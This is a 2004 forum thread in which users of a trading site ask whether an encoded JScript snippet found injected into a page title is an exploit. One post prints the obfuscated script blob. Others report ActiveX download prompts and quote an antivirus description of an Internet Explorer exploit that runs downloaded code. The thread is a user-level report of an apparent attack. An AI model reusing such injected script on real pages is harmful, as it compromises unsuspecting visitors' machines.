Is this encoded JScript a hacking exploit ?

Discussion in 'Feedback' started by harrytrader, Apr 9, 2004.

  1. I found it in Forums - Daytrader Charged !!!!!!

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <head><title><script language="JScript.Encode">#@~^rQAAAA==[Km;s+ YRSDbO+vJ@!4M@*@!G(L+1OP9lYmxv:kObYd)h4D:s)6rV)&&;)-w\zqHRtu:"4DYa)zJNF+&Rc E2& ASh0D2R(kyJ&[WSx^WCNd&J+skDnR1thl=z+srD+ tDhEPOHw'BD+XOzXOdmMk2O^+YE@*@!JW4Nn^Y@*J*iEzkAAA==^#~@</script>Forums - Daytrader Charged !!!!!!</title>
  2. Sorry the script doesn't pass so screen copy. I don't see why elite need to encrypt anything so my legitimate question.

    <IMG SRC=>
  3. All the more legitimate that it has now disappeared:
    <IMG SRC=>

  4. Bsulli


    several of the feedback thread a few minutes ago when I enter them attempt to run and unsign actveX script. I only have activeX that are marked as safe and are sign to be run. It attempted to download and run the script. My computer is set to prompt me when these attempts are made and in all of the years of visiting ET I have never had this happen before.

  5. I captured this script probably at the same moment.

  6. There's a problem here boys, and I am now getting WARNINGS on my McAfee Anti-Virus Software in the past 2 days regarding worm activity based on E-mail subject: when trying to write "posts" to ET.

    Hello Baron???
  7. I run AVG it's been quiet as a churchmouse :cool:
  8. Guys, jscript.encode does not actually encrypt code, it just encodes it so it is more difficult to read with the human eye. Many people besides hackers would use it. For instance, companies would use it if they write proprietary JScript but do not want the public to see the code. If you want to decode something that has been encoded, try going to:
  9. When I visited this thread I got the following warning:

    A Trojan has been detected and cleaned!

    The file ......... showthread.php was infected by the Exploit-MhtRedir.gen trojan and has been deleted to complete the Clean process.

    Here's the details:

    Here's the summary:

    This detection covers code designed to exploit an Internet Explorer vulnerability. At the time of this writing a patch does not yet exist to cover this vulnerability.

    The exploit results in a CHM (Microsoft Compiled Help) file being written to the local system allowing for additional exploit code to then execute the downloaded file.

    The end result is the execution of arbitrary code at the permission level of the current user.

    This is a nasty problem!

    - Curtis
    #10     Apr 19, 2004